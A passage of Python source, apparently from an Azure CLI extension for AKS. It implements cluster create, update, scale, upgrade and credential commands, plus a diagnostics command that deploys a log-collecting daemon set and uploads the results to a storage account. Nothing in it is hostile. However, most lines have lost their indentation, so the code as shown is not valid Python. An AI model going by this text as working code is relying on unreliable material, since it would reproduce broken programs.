service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=None,
appgw_watch_namespace=None,
no_wait=False):
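    """Create a managed Kubernetes (AKS) cluster.

    Builds the ManagedCluster model from the provided arguments (agent pool, Linux/Windows
    profiles, service principal, networking, addons, AAD, identity, SKU) and submits it to
    the resource provider, retrying on transient service principal replication errors.
    """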
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
            raise CLIError('--enable-vmss conflicts with the provided vm_set_type ({})'.format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
availability_zones=node_zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
# Attach acr operation will be handled after the cluster is created
pass
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
service_principal_profile.client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_id,
appgw_subnet_id,
appgw_shared,
appgw_watch_namespace
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(
subscription=appgw_id_dict["subscription"],
resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
                    raise CLIError('Custom headers format is incorrect; expected comma-separated key=value pairs.')
headers[parts[0]] = parts[1]
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
            logger.info('The AKS cluster is being created, please wait...')
if monitoring:
# adding a wait here since we rely on the result for role assignment
created_cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(created_cluster, cluster_resource_id, cmd)
else:
created_cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers).result()
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if created_cluster.identity_profile is None or \
created_cluster.identity_profile["kubeletidentity"] is None:
                    logger.warning('Your cluster was created successfully, but we failed to attach the ACR to it. '
                                   'You can manually grant permission to the identity named <CLUSTER_NAME>-agentpool '
                                   'in the MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = created_cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None):
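    """Update an existing managed cluster: cluster autoscaler settings and profile, pod
    security policy, load balancer profile, attached/detached ACRs and API server
    authorized IP ranges."""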
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
# pylint: disable=too-many-boolean-expressions
    if not update_autoscaler and \
       cluster_autoscaler_profile is None and \
       not update_acr and \
       not update_lb_profile and \
       api_server_authorized_ip_ranges is None and \
       not update_pod_security:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
                       'to update per-node-pool autoscaler settings.')
node_count = instance.agent_pool_profiles[0].count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
if not cluster_autoscaler_profile:
instance.auto_scaler_profile = {}
else:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
    by the server, but are recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
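    """Fetch admin, user or monitoring credentials for the cluster and merge the returned
    kubeconfig into the file at `path` (or print it to stdout)."""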
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'azure-policy': 'azurepolicy',
'kube-dashboard': 'kubeDashboard',
'ingress-appgw': CONST_INGRESS_APPGW_ADDON_NAME
}
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
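    """Collect diagnostic information from the cluster by deploying the aks-periscope daemon
    set and uploading the results to the given (or discovered) storage account."""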
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
        raise CLIError('Cannot find the kubectl executable in PATH.')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
    print('If you share access to that storage account with Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/v0.2/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
normalized_fqdn = mc.fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{normalized_fqdn}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
    print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
return
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
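    """Scale the named node pool (or the cluster's only node pool) to `node_count` nodes."""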
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify a nodepool name or use the "az aks nodepool" command to scale a node pool.')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
kubernetes_version,
control_plane_only=False,
no_wait=False,
**kwargs): # pylint: disable=unused-argument
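    """Upgrade the cluster to `kubernetes_version`. Legacy clusters (fewer than 8 allowed
    node pools, or VMAS-based) always upgrade node pools together with the control plane;
    otherwise the user can choose a control-plane-only upgrade."""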
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
